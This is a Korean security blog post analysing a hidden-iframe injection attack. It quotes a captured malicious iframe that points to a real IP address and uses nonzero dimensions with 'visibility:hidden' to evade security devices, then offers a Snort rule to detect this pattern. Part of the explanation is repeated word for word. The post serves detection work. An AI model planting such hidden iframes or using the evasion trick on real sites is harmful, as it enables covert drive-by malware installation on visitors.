<iframe name=c24 src='hxxp://205.234.243.220/d/index.php?'+Math.round(Math.random()*28396)+'9c10b5bc42d8' width=62 height=458 style='visibility:hidden'></iframe>
iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.
그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..
위 코드에서 사용된 style='visibility:hidden' 은 iframe을 보이지 않게한다..
이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.
여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style='visibility:hidden' 옵션을 써서 iframe을 숨길까?
iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.
그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..
위 코드에서 사용된 style='visibility:hidden' 은 iframe을 보이지 않게한다..
이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.
여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style='visibility:hidden' 옵션을 써서 iframe을 숨길까?
alert tcp $EXTERNAL_NET $HTTP_PORTS->$HOME_NET any(msg:"iframe evation attack-visibility:hidden"; flow:established,from_server; content:"<iframe"; nocase; pcre:"/<iframe.{0,40}src=('|")(http|ftp)://.*(width|height)=[^=0].*style=('|")visibility:(\s)?hidden('|")/i"; sid:XXXXXXX; rev:1;)
오탐 발생하면 알려주시고 고칠 부분이 있으면 comment 달아주십시요..^^
ps. 위 iframe 코드를 제공해준 나의 영원한 동반자인 이지스(bscry) 고맙다..
Websense에서도 동일한 날짜(?)에 포스팅된게 있네요..그래서 패턴을 좀 바꿔봤습니다.
http://securitylabs.websense.com/content/Alerts/3488.aspx
'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글
| 보안장비 정책 설정 중 특이 로그 발견-1 (0) | 2012.03.09 |
|---|---|
| 카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요 (1) | 2011.04.04 |
| ZeroBoard PHP Mass Sql-Injection(download.php) (0) | 2010.01.26 |
| IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법) (1) | 2009.10.21 |
| iframe 신종(?)우회 방법-2 (0) | 2009.10.09 |
